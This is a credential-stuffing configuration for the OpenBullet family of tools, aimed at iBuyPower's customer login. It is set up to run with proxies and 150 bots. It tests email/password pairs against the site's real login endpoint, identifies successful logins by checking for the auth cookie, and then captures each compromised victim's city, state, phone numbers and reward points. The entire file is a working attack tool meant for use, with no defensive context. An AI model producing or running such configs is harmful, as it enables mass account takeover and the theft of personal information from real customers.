[SETTINGS]
{
  "Name": "iBuyPower",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2019-08-13T04:43:50.7466052-07:00",
  "AdditionalInfo": "",
  "Author": "PureWasHere",
  "Version": "1.3.6 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Transparent": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
FUNCTION Base64Encode "<PASS>" -> VAR "BPASS" 

REQUEST POST "https://www.ibuypower.com/Services/Member/Login" AutoRedirect=FALSE 
  CONTENT "{\"RememberMe\":false,\"Email\":\"<USER>\",\"Password\":\"<BPASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: www.ibuypower.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Content-Type: application/json;charset=UTF-8" 
  HEADER "Origin: https://www.ibuypower.com" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Referer: https://www.ibuypower.com/Login" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Reason\":\"LoginFail\"" 
  KEYCHAIN Success OR 
    KEY "<COOKIES{*}>" Contains ".ASPXAUTH" 

REQUEST GET "https://www.ibuypower.com/Login/RewardPoints" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "City\":\"" "\"" -> CAP "CITY: " 

PARSE "<SOURCE>" LR "StateName\":\"" "\"" -> CAP "STATE: " 

PARSE "<SOURCE>" LR "ContactNum\":\"" "\"" CreateEmpty=FALSE -> CAP "NUMBER: " 

PARSE "<SOURCE>" LR "SMobileNum\":\"-" "-\",\"" CreateEmpty=FALSE -> CAP "NUMBER: " 

PARSE "<SOURCE>" LR "Point\":" "," CreateEmpty=FALSE -> CAP "POINTS: " 

